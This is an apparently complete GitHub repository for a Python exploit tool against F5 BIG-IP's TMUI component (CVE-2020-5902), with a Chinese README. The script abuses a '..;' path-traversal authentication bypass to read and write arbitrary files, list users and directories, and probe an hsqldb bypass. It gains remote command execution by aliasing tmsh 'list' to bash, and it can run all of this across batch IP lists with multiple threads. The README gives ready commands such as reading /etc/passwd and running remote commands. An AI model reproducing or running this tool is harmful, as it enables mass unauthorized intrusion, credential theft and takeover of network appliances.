├── 1-2-f5.txt
├── LICENSE
├── README.md
├── batch_check_result
└── 20200712175217
│ └── success.txt
├── batch_hsqldb_auth_bypass_result
└── 20200709162928
│ └── success.txt
├── batch_rce_result
└── 20200708103305
│ └── success.txt
├── f5-bigip-rce-cve-2020-5902.py
└── img
├── f5rce00.png
├── f5rce01.png
├── f5rce02.png
├── f5rce03.png
├── f5rce04.png
├── f5rce05.png
├── f5rce06.png
├── f5rce07.png
├── f5rce08.png
├── f5rce09.png
└── f5rce10.png
/1-2-f5.txt:
--------------------------------------------------------------------------------
1 | https://15.19.18.21
2 | https://3.1.5.25
3 | https://4.8.2.10
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 LSA
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | F5 BIG-IP RCE(CVE-2020-5902)漏洞检测工具
2 | ==
3 |
4 |
5 | # Summary
6 |
7 | 20200706,网上曝出F5 BIG-IP TMUI RCE漏洞。
8 |
9 | F5 BIG-IP的TMUI组件(流量管理用户界面)存在认证绕过漏洞,该漏洞在于Tomcat解析的URL与request.getPathInfo()存在差异,导致可绕过权限验证,未授权访问TMUI模块所有功能,进而可以读取/写入任意文件,命令执行等。
10 |
11 | 详情参考[F5 BIG-IP TMUI RCE漏洞(CVE-2020-5902)重现及注意点 ](https://www.lsablog.com/networksec/penetration/f5-bigip-tmui-rce-cve-2020-5902-reproduce/)
12 |
13 | 本工具支持单IP检测,批量IP检测,可进行文件读写,列认证用户,列目录,远程命令执行和hsqldb认证绕过检测
14 |
15 |
16 | # Quick start
17 |
18 | pip install requests
19 |
20 |
21 | ## hlep
22 |
23 | python f5-bigip-rce-cve-2020-5902.py -h
24 |
25 | 
26 |
27 | ## poc check
28 |
29 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check
30 |
31 | 
32 |
33 | ## batch poc check
34 |
35 | python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10
36 |
37 | 
38 |
39 | ## read file
40 |
41 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"
42 |
43 | 
44 |
45 | ## save file
46 |
47 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"
48 |
49 | 
50 |
51 | ## list auth user
52 |
53 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users
54 |
55 | 
56 |
57 | ## list directory
58 |
59 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"
60 |
61 | 
62 |
63 | ## RCE
64 |
65 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit
66 |
67 | 
68 |
69 | ## batch RCE
70 |
71 | python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20
72 |
73 | 
74 |
75 |
76 | ## hsqldb bypass check
77 |
78 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb
79 |
80 | 
81 |
82 | ## batch hsqldb bypass check
83 |
84 | python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb
85 |
86 | 
87 |
88 |
89 | # Note
90 |
91 | **批量的IP尽量在开头加上http:\/\/或https:\/\/,如果没有协议,会默认加上http:\/\/**
92 |
93 | 条件允许的情况下建议加上--still-exploit参数,即使list auth user失败也进行rce,增加成功率。
94 |
95 |
96 | # TODO
97 |
98 | 1. 多次发请求增加批量成功率,需要权衡效率问题
99 |
100 | 2. 集成hsqldb接口反序列化利用
101 |
102 | 3. 增加自动化写webshell
103 |
104 |
105 | # Feedback
106 | [issus](https://github.com/theLSA/f5-bigip-rce-cve-2020-5902/issues)
107 |
108 | [lsablog](https://www.lsablog.com/networksec/penetration/f5-bigip-tmui-rce-cve-2020-5902-reproduce/)
109 |
110 | gmail:lsasguge196@gmail.com
111 |
112 | qq:2894400469@qq.com
113 |
--------------------------------------------------------------------------------
/batch_check_result/20200712175217/success.txt:
--------------------------------------------------------------------------------
1 | success result here
2 |
--------------------------------------------------------------------------------
/batch_hsqldb_auth_bypass_result/20200709162928/success.txt:
--------------------------------------------------------------------------------
1 | success result here
--------------------------------------------------------------------------------
/batch_rce_result/20200708103305/success.txt:
--------------------------------------------------------------------------------
1 | success result here
--------------------------------------------------------------------------------
/f5-bigip-rce-cve-2020-5902.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | #Author:LSA
3 | #Date:20200707
4 | #Description:f5-bigip-rce-cve-2020-5902,fileRead+fileSave+tmshCmd+hsqldb auth bypass
5 |
6 |
7 |
8 | import requests
9 | import optparse
10 | import sys
11 | import json
12 | import os
13 | import threading
14 | import Queue
15 | import datetime
16 |
17 | reload(sys)
18 | sys.setdefaultencoding('utf-8')
19 |
20 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
21 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
22 |
23 |
24 | headers = {"User-Agent": "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7"}
25 |
26 |
27 | lock = threading.Lock()
28 |
29 | q0 = Queue.Queue()
30 | threadList = []
31 |
32 | succ = 0
33 |
34 |
35 |
36 |
37 | def f5FileRead(tgtIP,fileRead,timeout):
38 |
39 |
40 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=' + fileRead
41 |
42 |
43 | fileReadRsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
44 |
45 | return fileReadRsp
46 |
47 |
48 |
49 |
50 |
51 | def f5FileSave(tgtIP,timeout,filePath,fileContent='null'):
52 |
53 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp'
54 |
55 | fileData = {"fileName": filePath, "content": fileContent} #md5(check-CVE-2020-5902-xxx)
56 |
57 |
58 | fileSaveRsp = requests.post(tgtUrl,headers=headers,data=fileData,timeout=timeout,verify=False)
59 |
60 | if fileSaveRsp.status_code == 200:
61 | fileReadRsp = f5FileRead(tgtIP,filePath,timeout)
62 | if fileContent in fileReadRsp.text:
63 | print filePath + ' saved successfully'
64 | else:
65 | print filePath + ' seems to have saved,but f5FileRead return content not right,please check manually.'
66 | return True
67 |
68 | else:
69 | print str(fileSaveRsp.status_code) + '\n' + fileSaveRsp.text
70 | print filePath + ' seems to have saved,but fileSaveRspStatusCode or fileSaveRspText return content not right,please check manually.'
71 | return False
72 |
73 |
74 | def f5ListAuthUsers(tgtIP,timeout):
75 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user'
76 | f5ListAuthUserRsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
77 |
78 |
79 | if f5ListAuthUserRsp.status_code == 200:
80 | if (f5ListAuthUserRsp.json()['error'] == "") and (f5ListAuthUserRsp.json()['output'] != ""):
81 | print f5ListAuthUserRsp.json()
82 | print 'list auth users successfully!'
83 | return True
84 | else:
85 | print f5ListAuthUserRsp.json()
86 | print 'list auth users failed'
87 | return False
88 | else:
89 | print str(f5ListAuthUserRsp.status_code)
90 | print 'list auth users failed.'
91 | return False
92 |
93 |
94 | def f5ListDirectory(tgtIP,f5Directory,timeout):
95 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=' + f5Directory
96 |
97 |
98 | f5DirectoryListRsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
99 |
100 | print str(f5DirectoryListRsp.status_code) + '\n' + f5DirectoryListRsp.text.strip()
101 |
102 |
103 |
104 |
105 | def f5rce(tgtIP,rce,timeout,stillExploitFlag):
106 |
107 | f5lau = f5ListAuthUsers(tgtIP,timeout)
108 |
109 | if f5lau or stillExploitFlag:
110 |
111 |
112 | if tgtIP.startswith(("http", "https")):
113 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp'
114 | else:
115 | tgtUrl = "http://" + tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp'
116 |
117 | tmshcmdData0 = {"command": "create cli alias private list command bash"}
118 | tmshcmdData1 = {"command": "list /tmp/xtx.txt"}
119 | tmshcmdData2 = {"command": "delete cli alias private list"}
120 |
121 | f5rceRsp0 = requests.post(tgtUrl, headers=headers, data=tmshcmdData0, timeout=timeout, verify=False)
122 |
123 |
124 | if f5rceRsp0.status_code == 200 and f5rceRsp0.json()['error'] == "":
125 | print 'Successfully created alias list=bash'
126 |
127 | f5RceFilePath = '/tmp/xtx.txt'
128 | f5RceFileContent = rce
129 |
130 | f5FileSaveReturn = f5FileSave(tgtIP,timeout,f5RceFilePath,f5RceFileContent)
131 |
132 | if f5FileSaveReturn:
133 |
134 | f5rceRsp1 = requests.post(tgtUrl,headers=headers,data=tmshcmdData1,timeout=timeout, verify=False)
135 |
136 | if f5rceRsp1.status_code == 200 and f5rceRsp1.json()['error'] == "":
137 | print 'rce seems to have succeed,result:\n' + f5rceRsp1.text.strip()
138 |
139 | else:
140 | print 'rce failed,result status_code:' + str(f5rceRsp1.status_code) + '\n' + f5rceRsp1.text.strip()
141 |
142 | f5rceRsp2 = requests.post(tgtUrl,headers=headers,data=tmshcmdData2,timeout=timeout, verify=False)
143 | if f5rceRsp2.status_code == 200 and f5rceRsp2.json()['error'] == "":
144 | print 'Successfully deleted alias list=bash'
145 | else:
146 | print 'Failed to delete alias list=bash'
147 |
148 | f5RceFileContentToReplace = 'null'
149 |
150 | f5FileSaveReturn1 = f5FileSave(tgtIP,timeout,f5RceFilePath,f5RceFileContentToReplace)
151 |
152 | if f5FileSaveReturn1:
153 | print 'f5FileSave replaced successfully'
154 | else:
155 | print 'f5FileSave replace failed'
156 | successInfo = []
157 | successInfo.append(tgtIP)
158 | successInfo.append('[listAuthUser:' + str(f5lau) + ']')
159 |
160 |
161 | successInfo.append(f5rceRsp1.json())
162 | print successInfo
163 | return successInfo
164 |
165 |
166 | else:
167 | print 'f5FileSave failed'
168 |
169 | return False
170 |
171 |
172 | else:
173 | print 'Created alias list=bash failed'
174 | return False
175 | else:
176 | print 'Exploit stopped because f5ListAuthUsers and stillExploitFlag both False.If want to exploit anyway,please use --still-exploit'
177 | return False
178 |
179 |
180 |
181 | def f5rce_batch(rce,timeout,f4success,stillExploitFlag):
182 | global countLines
183 | while(not q0.empty()):
184 | tgtIP = q0.get()
185 |
186 | qcount = q0.qsize()
187 |
188 | print 'Exploiting-' + tgtIP + '---------------[' + str(countLines - qcount) + ']'
189 |
190 | try:
191 | returnSuccessInfo = f5rce(tgtIP,rce,timeout,stillExploitFlag)
192 |
193 |
194 |
195 | if returnSuccessInfo == False:
196 | continue
197 |
198 |
199 | if ('True' in returnSuccessInfo[1]) or (returnSuccessInfo[2]['output'] != ""):
200 | lock.acquire()
201 | f4success.write(str(returnSuccessInfo)+'\n')
202 | lock.release()
203 | global succ
204 | succ = succ + 1
205 | else:
206 | continue
207 |
208 | except:
209 | print "Caused exception,continue next"
210 | continue
211 |
212 |
213 |
214 | def f5HsqldbAuthBypass(tgtIP,timeout):
215 |
216 | urlBypass0 = tgtIP + '/hsqldb;'
217 |
218 | hsqldbRsp = requests.get(urlBypass0, headers=headers,timeout=timeout,verify=False)
219 |
220 | if ('HSQL Database Engine' in hsqldbRsp.text) and (hsqldbRsp.status_code == 200):
221 | print 'Use [/hsqdb;] bypass auth successfully'
222 | print hsqldbRsp.text
223 | #return True
224 | returnF5HsqldbAuthBypassInfo = tgtIP + '/hsqldb;'
225 | return returnF5HsqldbAuthBypassInfo
226 | else:
227 | urlBypass1 = tgtIP + '/hsqldb%0a'
228 |
229 | hsqldbRsp1 = requests.get(urlBypass1, headers=headers,timeout=timeout,verify=False)
230 |
231 | if ('HSQL Database Engine' in hsqldbRsp1.text) and (hsqldbRsp1.status_code == 200):
232 | print 'Use [/hsqdb%0a] bypass auth successfully'
233 | print hsqldbRsp1.text
234 | #return True
235 | returnF5HsqldbAuthBypassInfo = tgtIP + '/hsqldb%0a'
236 | return returnF5HsqldbAuthBypassInfo
237 | else:
238 | print 'bypass hsqldb failed'
239 | print str(hsqldbRsp.status_code)
240 | print hsqldbRsp.text
241 | return False
242 |
243 |
244 |
245 | def f5HsqldbAuthBypassBatch(timeout,f4success):
246 |
247 | global countLines1
248 | while(not q0.empty()):
249 | tgtIP = q0.get()
250 |
251 | qcount = q0.qsize()
252 |
253 | print 'Checking[hsqldb]-' + tgtIP + '---------------[' + str(countLines1 - qcount) + ']'
254 |
255 | try:
256 | f5HsqldbAuthBypassReturn = f5HsqldbAuthBypass(tgtIP,timeout)
257 |
258 | except:
259 | print "Caused exception,continue next"
260 | continue
261 |
262 | #if f5HsqldbAuthBypassReturn == True:
263 | if f5HsqldbAuthBypassReturn:
264 | lock.acquire()
265 | #f4success.write(tgtIP+'\n')
266 | f4success.write(f5HsqldbAuthBypassReturn+'\n')
267 | lock.release()
268 | global succ
269 | succ = succ + 1
270 |
271 |
272 | else:
273 | continue
274 |
275 |
276 |
277 | def f5BypassAuthCheck(tgtIP,timeout):
278 |
279 | poc0 = '/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902'
280 | poc1 = '/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp'
281 |
282 | tgtUrl0 = tgtIP + poc0
283 | tgtUrl1 = tgtIP + poc1
284 |
285 | try:
286 |
287 | f5BypassAuthCheckRsp0 = requests.get(tgtUrl0, headers=headers, timeout=timeout, verify=False)
288 |
289 |
290 | if (f5BypassAuthCheckRsp0.status_code == 200 and 'test5902' in f5BypassAuthCheckRsp0.text):
291 | print '[POC0]' + tgtIP + ' is vulnerable!!!'
292 | return True
293 |
294 | else:
295 | f5BypassAuthCheckRsp1 = requests.get(tgtUrl1, headers=headers, timeout=timeout, verify=False)
296 |
297 | if f5BypassAuthCheckRsp1.status_code == 200:
298 | print '[POC1]' + tgtIP + ' is vulnerable!!!'
299 | return True
300 |
301 | except:
302 | print 'Caused exceptions,check stopped,please check it manually\n'
303 | return False
304 |
305 |
306 | print tgtIP + ' is not vulnerable'
307 | return False
308 |
309 |
310 |
311 | def f5BypassAuthCheckBatch(timeout,f4success):
312 |
313 | global countLines2
314 | while(not q0.empty()):
315 | tgtIP = q0.get()
316 |
317 | qcount = q0.qsize()
318 |
319 | print 'Checking-' + tgtIP + '---------------[' + str(countLines2 - qcount) + ']'
320 |
321 | try:
322 | f5BypassAuthCheckReturn = f5BypassAuthCheck(tgtIP,timeout)
323 |
324 | except:
325 | print "Caused exception,continue next"
326 | continue
327 |
328 | #if f5HsqldbAuthBypassReturn == True:
329 | if f5BypassAuthCheckReturn:
330 | lock.acquire()
331 | #f4success.write(tgtIP+'\n')
332 | f4success.write(tgtIP+'\n')
333 | lock.release()
334 | global succ
335 | succ = succ + 1
336 |
337 |
338 | else:
339 | continue
340 |
341 |
342 |
343 | if __name__ == '__main__':
344 |
345 | print '''
346 |
347 | **********************************************************
348 | * F5-BIGIP-RCE-CVE-2020-5902 *
349 | * (fileRead.jsp+fileSave.jsp+tmshCmd.jsp+hsqldb) *
350 | * Coded By LSA *
351 | **********************************************************
352 |
353 | '''
354 |
355 | parser = optparse.OptionParser('python %prog ' + '-h(manual)', version='%prog v1.0')
356 |
357 | parser.add_option('-u', dest='tgtIP', type='string', help='input the single target(IP)')
358 | parser.add_option('--fileread', dest='fileRead', type='string', help='read the local file(such as /etc/passwd)')
359 | parser.add_option('-s', dest='timeout', type='int', default=7, help='timeout(7 seconds defalut)')
360 | parser.add_option('--rce', dest='rce', type='string', help='input the command to execute')
361 | parser.add_option('--filepath', dest='filePath', type='string', help='input the save file path')
362 | parser.add_option('--filecontent', dest='fileContent', type='string', help='input the save file content')
363 | parser.add_option('--list-users', dest='listUsers', action='store_true', help="list auth users")
364 | parser.add_option('--still-exploit', dest='stillExploit', action='store_true', help='still exploit although f5ListAuthUsers return False')
365 | parser.add_option('--listdir', dest='listDir', type='string', help='list directory path')
366 | parser.add_option('-f', dest='tgtIPsPath', type='string', help='target ips file')
367 | parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads')
368 | parser.add_option('--bypass-hsqldb',dest='bypassHsqldb',action='store_true',help='check /hsqldb auth bypass')
369 | parser.add_option('--check',dest='checkBypassAuth',action='store_true',help='use poc0 and poc1 to check')
370 |
371 | (options, args) = parser.parse_args()
372 |
373 | tgtIP = options.tgtIP
374 |
375 | if tgtIP:
376 | if tgtIP.startswith(("http", "https")) == False:
377 | tgtIP = 'http://' + tgtIP
378 |
379 |
380 | timeout = options.timeout
381 | fileRead = options.fileRead
382 |
383 | filePath = options.filePath
384 | fileContent = options.fileContent
385 |
386 | listUsers = options.listUsers
387 |
388 | stillExploit = options.stillExploit
389 |
390 | rce = options.rce
391 |
392 | #threads = options.threads
393 |
394 | listDir = options.listDir
395 |
396 | bypassHsqldb = options.bypassHsqldb
397 |
398 | checkBypassAuth = options.checkBypassAuth
399 |
400 | if stillExploit:
401 | stillExploitFlag = 1
402 | else:
403 | stillExploitFlag = 0
404 |
405 |
406 | if tgtIP and fileRead:
407 | f5FileReadRsp = f5FileRead(tgtIP,fileRead,timeout)
408 | print str(f5FileReadRsp.status_code) + '\n' + f5FileReadRsp.text.strip()
409 | sys.exit()
410 |
411 | if tgtIP and filePath and fileContent:
412 | f5FileSave(tgtIP,timeout,filePath,fileContent)
413 | sys.exit()
414 |
415 | if tgtIP and listUsers:
416 | f5ListAuthUsers(tgtIP,timeout)
417 | sys.exit()
418 |
419 |
420 | if tgtIP and rce:
421 | f5rce(tgtIP,rce,timeout,stillExploitFlag)
422 | sys.exit()
423 |
424 | if tgtIP and listDir:
425 | f5ListDirectory(tgtIP,listDir,timeout)
426 | sys.exit()
427 |
428 | if options.tgtIPsPath and rce:
429 | tgtIPsPath = options.tgtIPsPath
430 | threads = options.threads
431 | nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
432 | os.mkdir('batch_rce_result/'+str(nowtime))
433 | f4success = open('batch_rce_result/'+str(nowtime)+'/'+'success.txt','w')
434 | #f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w')
435 | ipsFile = open(tgtIPsPath)
436 | #global countLines
437 | countLines = len(open(tgtIPsPath,'rU').readlines())
438 |
439 | print '===Total ' + str(countLines) + ' urls==='
440 |
441 | for ips in ipsFile:
442 | ips = ips.strip()
443 | if ips.startswith(("http", "https")) == False:
444 | ips = 'http://' + ips
445 | q0.put(ips)
446 | for thread in range(threads):
447 | t = threading.Thread(target=f5rce_batch,args=(rce,timeout,f4success,stillExploitFlag))
448 | t.start()
449 | threadList.append(t)
450 | for th in threadList:
451 | th.join()
452 |
453 |
454 | print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines) + ']###'
455 | print 'Results were saved in ./batch_rce_result/' + str(nowtime) + '/'
456 | f4success.close()
457 |
458 | if tgtIP and bypassHsqldb:
459 | f5HsqldbAuthBypass(tgtIP,timeout)
460 |
461 | if options.tgtIPsPath and bypassHsqldb:
462 | tgtIPsPath = options.tgtIPsPath
463 | threads = options.threads
464 | nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
465 | os.mkdir('batch_hsqldb_auth_bypass_result/'+str(nowtime))
466 | f4success = open('batch_hsqldb_auth_bypass_result/'+str(nowtime)+'/'+'success.txt','w')
467 | #f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w')
468 | ipsFile = open(tgtIPsPath)
469 | #global countLines1
470 | countLines1 = len(open(tgtIPsPath,'rU').readlines())
471 |
472 | print '===Total ' + str(countLines1) + ' urls==='
473 |
474 | for ips in ipsFile:
475 | ips = ips.strip()
476 | if ips.startswith(("http", "https")) == False:
477 | ips = 'http://' + ips
478 | q0.put(ips)
479 | for thread in range(threads):
480 | t = threading.Thread(target=f5HsqldbAuthBypassBatch,args=(timeout,f4success))
481 | t.start()
482 | threadList.append(t)
483 | for th in threadList:
484 | th.join()
485 |
486 |
487 | print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines1) + ']###'
488 | print 'Results were saved in ./batch_hsqldb_auth_bypass_result/' + str(nowtime) + '/'
489 | f4success.close()
490 |
491 |
492 | if tgtIP and checkBypassAuth:
493 | f5BypassAuthCheck(tgtIP,timeout)
494 |
495 | if options.tgtIPsPath and checkBypassAuth:
496 | tgtIPsPath = options.tgtIPsPath
497 | threads = options.threads
498 | nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
499 | os.mkdir('batch_check_result/'+str(nowtime))
500 | f4success = open('batch_check_result/'+str(nowtime)+'/'+'success.txt','w')
501 | #f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w')
502 | ipsFile = open(tgtIPsPath)
503 | #global countLines2
504 | countLines2 = len(open(tgtIPsPath,'rU').readlines())
505 |
506 | print '===Total ' + str(countLines2) + ' urls==='
507 |
508 | for ips in ipsFile:
509 | ips = ips.strip()
510 | if ips.startswith(("http", "https")) == False:
511 | ips = 'http://' + ips
512 | q0.put(ips)
513 | for thread in range(threads):
514 | t = threading.Thread(target=f5BypassAuthCheckBatch,args=(timeout,f4success))
515 | t.start()
516 | threadList.append(t)
517 | for th in threadList:
518 | th.join()
519 |
520 |
521 | print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines2) + ']###'
522 | print 'Results were saved in ./batch_check_result/' + str(nowtime) + '/'
523 | f4success.close()
524 |
--------------------------------------------------------------------------------
/img/f5rce00.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce00.png
--------------------------------------------------------------------------------
/img/f5rce01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce01.png
--------------------------------------------------------------------------------
/img/f5rce02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce02.png
--------------------------------------------------------------------------------
/img/f5rce03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce03.png
--------------------------------------------------------------------------------
/img/f5rce04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce04.png
--------------------------------------------------------------------------------
/img/f5rce05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce05.png
--------------------------------------------------------------------------------
/img/f5rce06.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce06.png
--------------------------------------------------------------------------------
/img/f5rce07.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce07.png
--------------------------------------------------------------------------------
/img/f5rce08.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce08.png
--------------------------------------------------------------------------------
/img/f5rce09.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce09.png
--------------------------------------------------------------------------------
/img/f5rce10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce10.png
--------------------------------------------------------------------------------